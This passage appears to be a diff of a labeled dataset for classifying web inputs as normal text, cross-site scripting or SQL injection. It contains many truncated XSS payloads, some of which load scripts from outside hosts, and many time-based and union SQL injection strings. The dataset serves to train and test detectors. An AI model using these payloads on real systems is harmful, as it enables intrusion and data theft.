5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,20827 +or SLEEP(5),2,SQLi,10380 +Select a method to solve the problem.,0,normal,24123 +or '' ',2,SQLi,9881 +"1"" where 9230 = 9230",2,SQLi,13162 +"<samp onkeypress=""alert(1)"" contenteditable>test</",1,XSS,2775 +"1%"" and ( select * from ( select ( sleep ( 5 ) ) )",2,SQLi,13029 +1' ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ),2,SQLi,20446 +"1' ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( 'xws",2,SQLi,12951 +1 where 7802 = 7802,2,SQLi,16477 +<object onpointerup=alert(1)>XSS</object>,1,XSS,1989 +"{""id"":null,""firstName"":""Ng"",""lastName"":""George"",""a",0,normal,26972 +<ins onpointerout=alert(1)>XSS</ins>,1,XSS,7282 +<discard onpointermove=alert(1)>XSS</discard>,1,XSS,2674 +"1 ) as wbcd where 9506 = 9506 or row ( 1045,7562 )",2,SQLi,16263 +<form><input formaction=javascript:alert(1) type=i,1,XSS,9178 +1' ) where 8118 = 8118,2,SQLi,17361 +Select a domain name service provider or registrar,0,normal,25662 +"1"" or ( select 9173 from ( select count ( * ) ,con",2,SQLi,19312 +"<img src=x onerror=""&#0000106&#0000097&#0000118&#0",1,XSS,250 +"<select onmouseover=""alert(1)"">test</select>",1,XSS,8188 +"<li onkeydown=""alert(1)"" contenteditable>test</li>",1,XSS,5887 +"-6550' ) where 1675 = 1675 union all select 1675,1",2,SQLi,18728 +Select your dream wedding flowers.,0,normal,24391 +Select a topic for a conversation.,0,normal,24119 +<kbd onpointerleave=alert(1)>XSS</kbd>,1,XSS,6592 +"1%"" ) ) waitfor delay '0:0:5' and ( ( ""%"" = """,2,SQLi,13783 +"-1162"" ) ) as mhmh where 8710 = 8710 or make_set (",2,SQLi,22061 +<frameset onload=javascript:alert(1)>,1,XSS,628 +Join the cycling club.,0,normal,22687 +"1"" ) ) as hwlh where 1071 = 1071 union all select ",2,SQLi,13275 +She'll select her bridesmaids.,0,normal,24373 +"<i draggable=""true"" ondrag=""alert(1)"">test</i>",1,XSS,4768 +"{""id"":null,""name"":""Barn Owl""}",0,normal,27074 +The Israelites were commanded to select on the ten,0,normal,25422 +1' ) where 5214 = 5214,2,SQLi,16515 +Select exchange.,0,normal,24762 +Insert link.,0,normal,23078 +1'|| ( select 'bezt' where 7876 = 7876,2,SQLi,20569 +"-9353"" where 4607 = 4607 union all select 4607,460",2,SQLi,13785 +"1"" ) as yekp where 3049 = 3049 and char ( 111 ) ||",2,SQLi,12430 +"<code draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,6998 +Where's your SQL familiarity?,0,normal,23395 +"1%"" union all select null,null,null,null,null,null",2,SQLi,18785 +"a=""get"";",1,XSS,6308 +Select Comfort – Select Comfort lost two cents per,0,normal,25638 +Merge the project files.,0,normal,22681 +Search where date is today.,0,normal,23443 +"-8893%' ) ) or elt ( 1032 = 1032,3623 ) and ( ( '%",2,SQLi,12395 +"-2583"" ) where 3455 = 3455 or make_set ( 9354 = 93",2,SQLi,17573 +coalesce,0,normal,23194 +-8828 ) ) as ospo where 2141 = 2141 or 4493 = utl_,2,SQLi,15475 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10706 +"{""id"":null,""name"":""wing mail""}",0,normal,27231 +1' ) ) ) and ( select * from ( select ( sleep ( 5 ,2,SQLi,21701 +"<label dataformatas=""html"" datasrc=""#xss"" datafld=",1,XSS,9223 +<kbd id=x tabindex=1 onfocusin=alert(1)></kbd>,1,XSS,4250 +"{""id"":null,""name"":""addition""}",0,normal,27006 +")) AND ELT(1337=1337,SLEEP(5)) AND ((1337"" LIKE ""1",2,SQLi,11276 +"<div id=""121""><html xmlns=""http://www.w3.org/1999/",1,XSS,9110 +"javascript:/*`//'//\""//</style></noscript></script",1,XSS,9500 +1 and 8635 = ( select count ( * ) from generate_se,2,SQLi,17483 +"AND ELT(1337=1337,SLEEP(5))--",2,SQLi,11244 +"</script><img/*/src=""worksinchrome&colon;prompt&#x",1,XSS,1275 +"<listing draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,5701 +<svg onpointerover=alert(1)>XSS</svg>,1,XSS,7681 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10991 +<button onClick=javascript:alert(1)>,1,XSS,9593 +<video controls autoplay onended=alert(1)><source ,1,XSS,3361 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,16570 +"1%' ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x7",2,SQLi,22228 +Group data where necessary.,0,normal,23326 +Select a shade of lipstick for the evening.,0,normal,24078 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,15238 +"<dialog onkeyup=""alert(1)"" contenteditable>test</d",1,XSS,6516 +1 ) as qodq where 4945 = 4945 or 9643 = ( select c,2,SQLi,16082 +<tr onblur=alert(1) tabindex=1 id=x></tr><input au,1,XSS,4570 +1 where 2060 = 2060,2,SQLi,13258 +))%20waitfor%20delay%20'0:0:20'%20/*,2,SQLi,10851 +1 and ( 1977 = 6852 ) *6852-- clxl,2,SQLi,19250 +Let's choose a location for our gathering.,0,normal,23967 +<svg><blockquote onload=alert(1)></blockquote>,1,XSS,1963 +<output id=x tabindex=1 onactivate=alert(1)></outp,1,XSS,4995 +"<style onmousedown=""alert(1)"">test</style>",1,XSS,4894 +1' in boolean mode ) and char ( 109 ) ||char ( 79 ,2,SQLi,14333 +"{""id"":null,""name"":""give""}",0,normal,26908 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6229 +Can't select that.,0,normal,24421 +Locate items where required.,0,normal,23305 +<img/src=`` onerror=this.onerror=confirm(1),1,XSS,1253 +<listing onpointermove=alert(1)>XSS</listing>,1,XSS,3179 +<input4 onpointerenter=alert(1)>XSS</input4>,1,XSS,3362 "<SCRIPT a=>SRC=""httx://xss.rocks/xss.js""></SCRIPT>",1,XSS,308 -She'll select her bridal gown.,0,normal,24384 -"Select ""Transfer to Bank"" or ""Transfer Money"" (you",0,normal,25668 -Where's the concert?,0,normal,23581 -"-2027%"" ) union all select 2048,2048,2048,2048,204",2,SQLi,12581 -He is vice chairman of the Senate Select Committee,0,normal,26116 -Select a book for your reading time.,0,normal,24100 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,12226 -"&lt;A HREF=\""http&#58;//0x42&#46;0x0000066&#46;0x7",1,XSS,1052 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14520 -select * from users where id = 1 or \.<1 or 1 = 1 ,2,SQLi,11411 -<isindex formaction=javascript:alert(1) type=submi,1,XSS,9222 -AS INJECTX WHERE 1=1 AND 1=1--,2,SQLi,10235 -<multicol id=x tabindex=1 onactivate=alert(1)></mu,1,XSS,4764 -"<a href=http://foo.bar/#x=`y></a><img alt=""`><img ",1,XSS,9063 -<svg><ol onload=alert(1)></ol>,1,XSS,1875 -hi or a = a,2,SQLi,22486 -1' ) as kgnd where 1550 = 1550 and 3202 = like ( ',2,SQLi,13683 -"1%"" and 6414 = ( select count ( * ) from rdb$field",2,SQLi,20707 -select,0,normal,26603 -<dd onpointerdown=alert(1)>XSS</dd>,1,XSS,5832 -Select your proposal.,0,normal,24945 +Select the perfect wedding ceremony location.,0,normal,24381 +Select a background color by clicking on the color,0,normal,25665 +Where's the gallery?,0,normal,23578 +"1"" ) ) and ( select 9067 from ( select count ( * )",2,SQLi,12583 +He said he likes the Financial Select Sector SPDR ,0,normal,26113 +Select the best camera settings for shots.,0,normal,24097 +select ( case when ( 2161 = 4328 ) then 2161 else ,2,SQLi,12228 +"&lt;A HREF=\""http&#58;//0102&#46;0146&#46;0007&#46",1,XSS,1053 +"1"" ) where 4964 = 4964",2,SQLi,14522 +select * from users where id = 1 union select 1||1,2,SQLi,11413 +"<label>type a,b,c,d - watch the network tab/traffi",1,XSS,9224 +WHERE 1=1 AND 1=1,2,SQLi,10237 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4766 +"<a id=""x""><rect fill=""white"" width=""1000"" height=""",1,XSS,9065 +"<base onmouseover=""alert(1)"">test</base>",1,XSS,1876 +1'+ ( select wjpc where 5943 = 5943 and make_set (,2,SQLi,22483 +-9690 union all select 7217#,2,SQLi,13685 +1' ) ) or 5286 = ( select count ( * ) from all_use,2,SQLi,20709 +select,0,normal,26600 +"<center draggable=""true"" ondragend=""alert(1)"">test",1,XSS,5834 +Select your petition.,0,normal,24942 <svg><script>alert&NewLine;(1)</script></svg>,1,XSS,192 -1 or 7552 = ( select count ( * ) from rdb$fields a,2,SQLi,12902 -select sleep ( 5 ) and ( 'labj' = 'labj,2,SQLi,13234 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,12630 -<menuitem onpointerup=alert(1)>XSS</menuitem>,1,XSS,4486 -><script+src=http://app-sjint.marketo.com/index.ph,1,XSS,9784 -"<article ondblclick=""alert(1)"">test</article>",1,XSS,3925 -"admin"") or ""1""=""1""#",2,SQLi,9941 -"{""id"":null,""firstName"":""Li"",""lastName"":""Er"",""addre",0,normal,26904 -Whether you choose to select the pattern in secret,0,normal,25136 -Select a podcast episode to listen to.,0,normal,24142 -"-7240' ) ) union all select 8064,8064,8064#",2,SQLi,15199 -"1' in boolean mode ) union all select null,null,nu",2,SQLi,16062 -1' in boolean mode ) or 2633 = dbms_pipe.receive_m,2,SQLi,19498 -"<time draggable=""true"" ondrag=""alert(1)"">test</tim",1,XSS,3304 -"1"" ) and sleep ( 5 ) and ( ""ytof"" = ""ytof",2,SQLi,15550 -if ( 3245 = 6168 ) select 3245 else drop function ,2,SQLi,18075 -"1"" ) where 4426 = 4426 and 3715 in ( ( char ( 113 ",2,SQLi,21433 -"-3104"" union all select 5717,5717,5717,5717,5717,5",2,SQLi,13305 --9771' or 5113 = 5365,2,SQLi,19693 -"-1083%"" ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ",2,SQLi,17889 -"<aside onmouseout=""alert(1)"">test</aside>",1,XSS,1807 -"<dfn oncopy=""alert(1)"" contenteditable>test</dfn>",1,XSS,3872 -"<big ondblclick=""alert(1)"">test</big>",1,XSS,3792 -La La Land is currently in limited release in sele,0,normal,25916 -"-4964"" ) ) union all select 4750,4750,4750,4750,47",2,SQLi,14155 -"<canvas onmouseleave=""alert(1)"">test</canvas>",1,XSS,2787 -<script src=javascript:alert(1)>,1,XSS,9260 -select,0,normal,23103 -<IMG SRC='javascript:alert('XSS');'>,1,XSS,1718 -"<header draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2697 -"<noembed onkeyup=""alert(1)"" contenteditable>test</",1,XSS,1849 -1' and 3707 = ( select count ( * ) from sysibm.sys,2,SQLi,20897 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10624 -1' ) where 7322 = 7322 and 5556 = ( select count (,2,SQLi,22403 -1' ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ,2,SQLi,12853 -<hgroup onpointerleave=alert(1)>XSS</hgroup>,1,XSS,6623 -"<dl onmousedown=""alert(1)"">test</dl>",1,XSS,3436 -Sort the scattered leaves in the yard.,0,normal,22977 -1'+ ( select rhlb where 9477 = 9477,2,SQLi,16527 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6772 -select,0,normal,26630 -"<b onbeforecopy=""alert(1)"" contenteditable>test</b",1,XSS,6993 -1 ) ) ) union all select null--,2,SQLi,22406 -Select a comfortable pillow for the night.,0,normal,22975 -You can also save $50 on select Fire HD 8 Tablet.,0,normal,25102 -Where's the orthodontist?,0,normal,23627 -select * from users where id = 1 or \< = 1 or 1 = ,2,SQLi,11602 -"<!--<img src=""--><img src=x onerror=alert(123)//"">",1,XSS,1118 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,1757 -1'|| ( select 'aoad' where 8795 = 8795 and char ( ,2,SQLi,16882 -"<style>@keyframes x{}</style><map style=""animation",1,XSS,6752 +1' or 2633 = dbms_pipe.receive_message ( chr ( 112,2,SQLi,12904 +-5547' or 9323 = 9323#,2,SQLi,13236 +-1219' ) or 5592 = 4835,2,SQLi,12632 +<main id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,4488 +><script+src=https://detector.alicdn.com/2.7.3/ind,1,XSS,9786 +"<header onkeypress=""alert(1)"" contenteditable>test",1,XSS,3927 +"1234 "" AND 1=0 UNION ALL SELECT ""admin"", ""81dc9bdb",2,SQLi,9943 +"{""id"":null,""firstName"":""Kai Keng"",""lastName"":""Choy",0,normal,26901 +Select score.,0,normal,24668 +"1%' ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ",2,SQLi,22100 +1%' ) ) ) and ( select 2* ( if ( ( select * from (,2,SQLi,15201 +1' ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ,2,SQLi,16064 +1'|| ( select 'hwyv' from dual where 1155 = 1155 a,2,SQLi,19500 +<frameset onfocusout=alert(1) tabindex=1 id=x></fr,1,XSS,3306 +"1"" where 9332 = 9332 union all select null,null,nu",2,SQLi,15552 +1'+ ( select xzse where 4530 = 4530,2,SQLi,18077 +"-4091"" ) ) ) union all select 6694,6694--",2,SQLi,21435 +"1"" ) ) rlike ( select ( case when ( 7689 = 7689 ) ",2,SQLi,13307 +"1', ( select ( case when ( 7711 = 7711 ) then 1 el",2,SQLi,19695 +"-9197%"" ) ) ) union all select 1040,1040,1040,1040",2,SQLi,17891 +"<canvas onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,1808 +<blink onpointerenter=alert(1)>XSS</blink>,1,XSS,3874 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3794 +"Last year, it introduced Lyft Premier to compete w",0,normal,25913 +1 ) ) as ehlg where 6340 = 6340,2,SQLi,14157 +"<style onmouseout=""alert(1)"">test</style>",1,XSS,2788 +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x7,1,XSS,9262 +Create site.,0,normal,23100 +"<iframe src=data:text/html,%3C%73%63%72%69%70%74%3",1,XSS,1719 +<xmp id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,2698 +"<area draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,1850 +"1' ) ) union all select null,null,null,null#",2,SQLi,20899 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10626 +1%' ) and 7533 = 7533 and ( '%' = ',2,SQLi,22401 +"1%"" ) ) ) or 1022 = ( select count ( * ) from all_",2,SQLi,12855 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6625 +"<frame onclick=""alert(1)"">test</frame>",1,XSS,3438 +Where's the missing key to your room?,0,normal,22974 +"-2216"" ) where 6692 = 6692 union all select 6692,6",2,SQLi,16529 +<embed onblur=alert(1) tabindex=1 id=x></embed><in,1,XSS,6774 +Select the perfect piece of artwork.,0,normal,24069 +"<tt onkeyup=""alert(1)"" contenteditable>test</tt>",1,XSS,6995 +1' in boolean mode ) procedure analyse ( extractva,2,SQLi,22404 +Select your idea.,0,normal,24847 +You can also select from special pages meant for d,0,normal,25099 +Where's the urgent care center?,0,normal,23624 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11604 +"<style><img src=""</style><img src=x onerror=alert(",1,XSS,1119 +"<frame oncut=""alert(1)"" contenteditable>test</fram",1,XSS,1758 +1 ) as xwgf where 4204 = 4204 and sleep ( 5 ) --,2,SQLi,16884 +"<content onkeypress=""alert(1)"" contenteditable>tes",1,XSS,6754 //<form/action=javascript&#x3A;alert&lpar;document,1,XSS,871 -1' ) where 6387 = 6387 and 6510 = ( select count (,2,SQLi,19742 -"<div id=""116""><div id=""x"">x</div>",1,XSS,9105 +"1"" or 8315 = ( select count ( * ) from sysibm.syst",2,SQLi,19744 +"<div id=""118""><div draggable=""true"" ondragstart=""e",1,XSS,9107 1<a href=#><line xmlns=urn:schemas-microsoft-com:v,1,XSS,722 -#ERROR!,2,SQLi,10998 -"( select 1 from generate_series ( 8515,8515,case w",2,SQLi,17271 -"1' where 8969 = 8969 union all select null,null,nu",2,SQLi,19728 -Can you help me decide where to study?,0,normal,23720 -Under the title of Select Scottish Ballads he repr,0,normal,25227 -<menu onpointermove=alert(1)>XSS</menu>,1,XSS,8348 -1' ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 w,2,SQLi,15589 -Our special Fortnite captains will select the top ,0,normal,25798 -"""))) waitfor delay '0:0:20' /*",2,SQLi,10939 -Delete the post.,0,normal,22877 -Where should we meet for our date?,0,normal,22965 +#ERROR!,2,SQLi,11000 +"-2840' ) ) ) union all select 3025,3025,3025,3025-",2,SQLi,17273 +"iif ( 2840 = 3788,1,1/0 )",2,SQLi,19730 +"{""id"":null,""firstName"":""Lee"",""lastName"":""Shaun"",""a",0,normal,26903 +"Ungar did not ""select a sample"" of his data to ana",0,normal,25224 +<rp onpointerdown=alert(1)>XSS</rp>,1,XSS,8350 +"select * from generate_series ( 7610,7610,case whe",2,SQLi,15591 +"Over nearly nine years, the research team tracked ",0,normal,25795 +""")))) waitfor delay '0:0:20' /*",2,SQLi,10941 +Select the tab.,0,normal,22874 +Modify the account settings for better security.,0,normal,22962 //some user agreement and sending to server logic ,1,XSS,315 -"From the ""Select and Mask"" menu, simply click anyw",0,normal,26163 -Insert the plug.,0,normal,22848 -I want to select a class to enroll in.,0,normal,23942 -1' ) ) waitfor delay '0:0:5' and ( ( 'jcfe' = 'jcf,2,SQLi,20589 -"<script ondblclick=""alert(1)"">test</script>",1,XSS,5851 -"<style>@keyframes x{}</style><dir style=""animation",1,XSS,6130 -<dfn onpointerout=alert(1)>XSS</dfn>,1,XSS,5448 -<dd id=x tabindex=1 ondeactivate=alert(1)></dd><in,1,XSS,3130 -1'+ ( select 'ewlk' where 1078 = 1078 and 2716 = (,2,SQLi,16280 -select ( case when ( 6276 = 6276 ) then 6276 else ,2,SQLi,15633 -"1"" or 5356 = ( select count ( * ) from sysusers as",2,SQLi,18381 +"From the F o rmat menu, select T abs... The Tabs d",0,normal,26160 +Filter the photos.,0,normal,22845 +Where did you find that cozy bookstore?,0,normal,23939 +1' where 4253 = 4253,2,SQLi,20591 +<ins onpointerenter=alert(1)>XSS</ins>,1,XSS,5853 +<address id=x tabindex=1 onfocusin=alert(1)></addr,1,XSS,6132 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5450 +<animatemotion onpointerup=alert(1)>XSS</animatemo,1,XSS,3132 +"1"" ) ) and 6537 = dbms_pipe.receive_message ( chr ",2,SQLi,16282 +"-6200' where 9150 = 9150 union all select 9150,915",2,SQLi,15635 +"1"" ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 w",2,SQLi,18383 <img src ?itworksonchrome?\/onerror = alert(1),1,XSS,911 -"<h1 draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,3969 -Merge the financial accounts for analysis.,0,normal,22936 -Select drive.,0,normal,24646 -; or '1'='1',2,SQLi,10166 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3971 +Create a captivating story with your imagination.,0,normal,22933 +Select sprint.,0,normal,24643 +; exec ('sel' + 'ect us' + 'er'),2,SQLi,10168 <script x> alert(1) </script 1=2,1,XSS,337 -Select ride.,0,normal,24647 -there was an attempt to select something,0,normal,25328 -"{""id"":null,""name"":""GroudonPrimal Groudon""}",0,normal,27432 -<body id=x tabindex=1 onfocus=alert(1)></body>,1,XSS,2986 -"""),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20",2,SQLi,10879 -"1""",2,SQLi,15917 -"1"" where 9461 = 9461",2,SQLi,21005 -"select * from users where id = 1 or "";,"" = 1 or 1 ",2,SQLi,11670 --2992%' ) ) ) or 4493 = utl_inaddr.get_host_addres,2,SQLi,20863 -"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,19943 -1 ) where 8320 = 8320 waitfor delay '0:0:5'--,2,SQLi,13908 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,11002 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4821 -1 where 6500 = 6500,2,SQLi,19801 -1 rlike ( select ( case when ( 7689 = 7689 ) then ,2,SQLi,16692 -1' ) where 6941 = 6941 and 6537 = dbms_pipe.receiv,2,SQLi,12101 -1'|| ( select 'lnhq' where 7526 = 7526,2,SQLi,21759 -1'|| ( select 'ptkj' from dual where 6263 = 6263 u,2,SQLi,16733 -1,0,normal,26672 -<meta onpointerover=alert(1)>XSS</meta>,1,XSS,7244 +Select hike.,0,normal,24644 +"These deals change all the time, but they always l",0,normal,25325 +Join dinner.,0,normal,23050 +<aside onpointerup=alert(1)>XSS</aside>,1,XSS,2987 +",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'",2,SQLi,10881 +1' ) and 8404 = 8651#,2,SQLi,15919 +"1' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,21007 +select * from users where id = 1 +\+. union select,2,SQLi,11672 +"-5275%' ) ) union all select 9382,9382,9382,9382,9",2,SQLi,20865 +"-2745' or elt ( 1032 = 1032,3623 )",2,SQLi,19945 +"1 ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 1",2,SQLi,13910 +#ERROR!,2,SQLi,11004 +<option onpointerup=alert(1)>XSS</option>,1,XSS,4823 +1%' ) ) waitfor delay '0:0:5'--,2,SQLi,19803 +"1 and elt ( 1210 = 1210,sleep ( 5 ) )",2,SQLi,16694 +"-1212%' ) or make_set ( 7588 = 2306,2306 ) and ( '",2,SQLi,12103 +1%' ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ,2,SQLi,21761 +1%' ) ) ) or 7427 = dbms_pipe.receive_message ( ch,2,SQLi,16735 +Just as demos for select titles are available for ,0,normal,25932 +"<tr oncut=""alert(1)"" contenteditable>test</tr>",1,XSS,7246 "{""id"":null,""name"":""Slaking""}",0,normal,27378 -"1', ( case when 8260 = 8260 then 1 else null end )",2,SQLi,14080 -1' ) ) ) and sleep ( 5 ) and ( ( ( 'lbmp' = 'lbmp,2,SQLi,20867 -"insert into users ( login, password, level ) value",2,SQLi,11875 -1%' ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( ,2,SQLi,14521 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8264 -select case when 7717 = 7717 then 1 else null end-,2,SQLi,18679 -"<noscript onmouseout=""alert(1)"">test</noscript>",1,XSS,6856 -"<footer onkeypress=""alert(1)"" contenteditable>test",1,XSS,8598 -Select your prayer.,0,normal,24938 -Select your verify.,0,normal,24997 -<aside onblur=alert(1) tabindex=1 id=x></aside><in,1,XSS,6902 -1' ) where 7537 = 7537 and 2006 = 2006,2,SQLi,18051 --9660 ) ) or 9762 = 9698,2,SQLi,21955 -and 1=1–,2,SQLi,9950 -"1"" ) and row ( 6237,7469 ) > ( select count ( * ) ",2,SQLi,16437 -&lt;SCRIPT SRC=http://ha.ckers.org/xss.js,1,XSS,1446 -Select your strategy.,0,normal,24834 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14822 -Modify your car.,0,normal,22828 -<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#,1,XSS,1696 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11085 -1'|| ( select 'mobv' from dual where 6338 = 6338,2,SQLi,16153 -"1%' ) ) and extractvalue ( 7982,concat ( 0x5c,0x71",2,SQLi,13384 -1' ) and 8312 = dbms_pipe.receive_message ( chr ( ,2,SQLi,17959 -"1"" ) ) procedure analyse ( extractvalue ( 5840,con",2,SQLi,20790 -"<;BR SIZE="";&;{alert(';XSS';)}"";>;",1,XSS,1631 +"-2122"" ) as zytb where 7025 = 7025 or 4747 = dbms_",2,SQLi,14082 +"1"" ) ) rlike ( select * from ( select ( sleep ( 5 ",2,SQLi,20869 +"select * from users where id = 1 or ""$@"" or 1 = 1 ",2,SQLi,11877 +1 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) -,2,SQLi,14523 +<slot onblur=alert(1) tabindex=1 id=x></slot><inpu,1,XSS,8266 +"( select * from generate_series ( 3906,3906,case w",2,SQLi,18681 +"<th draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,6858 +"<plaintext draggable=""true"" ondragleave=""alert(1)""",1,XSS,8600 +Where's your SQL work?,0,normal,23427 +Select your scrutinize.,0,normal,24994 +"<var onmouseenter=""alert(1)"">test</var>",1,XSS,6904 +"1"" ) where 8407 = 8407 and 9254 = ( select count (",2,SQLi,18053 +"1"" ) ) and 4386 = utl_inaddr.get_host_address ( ch",2,SQLi,21957 +and 'one'='one–,2,SQLi,9952 +-9197' ) or ( 6877 = 8010 ) *8010 and ( 'umwl' = ',2,SQLi,16439 +&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;,1,XSS,1447 +1 and 3707 = ( select count ( * ) from sysibm.syst,2,SQLi,22419 +"1"" ) or 8315 = ( select count ( * ) from sysibm.sy",2,SQLi,14824 +Insert the photo.,0,normal,22825 +"<IMG SRC=""jav&#x0A;ascript:alert(<WBR>'XSS');"">",1,XSS,1697 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11087 +"-9208%"" ) ) or 8571 = 8571--",2,SQLi,16155 +"-9183"" ) as wctu where 2058 = 2058 or 3038 = 3038",2,SQLi,13386 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,17961 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,20792 +<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;,1,XSS,1632 "<IMG LOWSRC=""javascript:alert('XSS')"">",1,XSS,270 -"<blockquote onbeforepaste=""alert(1)"" contenteditab",1,XSS,1882 -1%' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||c,2,SQLi,14524 -1'|| ( select 'lije' from dual where 5309 = 5309 a,2,SQLi,13901 -<meter id=x tabindex=1 onfocus=alert(1)></meter>,1,XSS,5075 -"<noframes draggable=""true"" ondragstart=""alert(1)"">",1,XSS,5510 -In the preface the author claims to have stated 20,0,normal,25993 -"With the remote, you can select an app and launch ",0,normal,25112 -Retrieve data where applicable.,0,normal,23344 -<datalist onpointerout=alert(1)>XSS</datalist>,1,XSS,2536 -AND 1=utl_inaddr.get_host_address((SELECT SYS.DATA,2,SQLi,11070 -Rather than being forced to select a single candid,0,normal,25758 -1 ) rlike ( select ( case when ( 5477 = 7492 ) the,2,SQLi,14681 +<command onfocusout=alert(1) tabindex=1 id=x></com,1,XSS,1883 +"1 ) union all select null,null,null,null,null#",2,SQLi,14526 +waitfor delay '0:0:5'-- thuo,2,SQLi,13903 +"<basefont draggable=""true"" ondragstart=""alert(1)"">",1,XSS,5077 +"<marquee onkeypress=""alert(1)"" contenteditable>tes",1,XSS,5512 +In the United States the same question was conside,0,normal,25990 +Sort alphabet blocks.,0,normal,22792 +Fetch information where applicable.,0,normal,23341 +<optgroup id=x tabindex=1 onfocusin=alert(1)></opt,1,XSS,2537 +AND 1=utl_inaddr.get_host_address((SELECT global_n,2,SQLi,11072 +Read on to find out how to select the right snowbl,0,normal,25755 +"1"" ) where 1607 = 1607",2,SQLi,14683 <script>eval('alert(\061)')</script>,1,XSS,187 -"admin"" ) or ""1"" = ""1""--",2,SQLi,11972 -"<audio onmouseover=""alert(1)"">test</audio>",1,XSS,5559 -"{""id"":null,""firstName"":""Tan"",""lastName"":""May"",""add",0,normal,27050 -select,0,normal,26589 -Select the ideal candidate.,0,normal,24294 -<i id=x tabindex=1 onactivate=alert(1)></i>,1,XSS,6588 -"1, ( select ( case when ( 8674 = 7896 ) then 1 els",2,SQLi,17619 -view,0,normal,23154 +select * from users where id = 1 +$ . or 1 = 1 -- ,2,SQLi,11974 +<element onpointerout=alert(1)>XSS</element>,1,XSS,5561 +"{""id"":null,""name"":""anywhere muscle""}",0,normal,27047 +select,0,normal,26586 +The Love Witch opens in select cinemas on November,0,normal,25416 +"<img oncontextmenu=""alert(1)"">test</img>",1,XSS,6590 +"1"" ) ) as exzo where 7518 = 7518 ( select ( case w",2,SQLi,17621 +full,0,normal,23151 "{""id"":null,""name"":""Dodrio""}",0,normal,27551 -"<iframe onmousemove=""alert(1)"">test</iframe>",1,XSS,3916 +<svg><br onload=alert(1)></br>,1,XSS,3918 "<style></style\x09<img src=""about:blank"" onerror=j",1,XSS,447 -"In Egypt, Uber also offers UberX, Select and Scoot",0,normal,26011 -"-8238' ) ) union all select 9797,9797,9797,9797,97",2,SQLi,14032 -1 where 3735 = 3735,2,SQLi,17229 -"1"" ) ) ) and 8407 = ( select count ( * ) from gene",2,SQLi,21586 -"<q oncontextmenu=""alert(1)"">test</q>",1,XSS,7125 -1' ) as sjij where 8659 = 8659,2,SQLi,20520 -"<content draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,2441 -<ins id=x tabindex=1 onactivate=alert(1)></ins>,1,XSS,3104 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11089 -<q onfocusout=alert(1) tabindex=1 id=x></q><input ,1,XSS,7693 -1%' ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash,2,SQLi,21159 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6095 ---></noscript></noembed></template></title></texta,1,XSS,9487 --9429' ) order by 1--,2,SQLi,18538 -"1"" or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||",2,SQLi,21903 -Randomly select again.,0,normal,24799 -"1"" where 8379 = 8379 and 6414 = ( select count ( *",2,SQLi,13224 -1' ) as elnu where 5719 = 5719 or 8156 = ( select ,2,SQLi,21452 -1' ) or 8315 = ( select count ( * ) from sysibm.sy,2,SQLi,16914 +"In making cigars by the hand, the operator 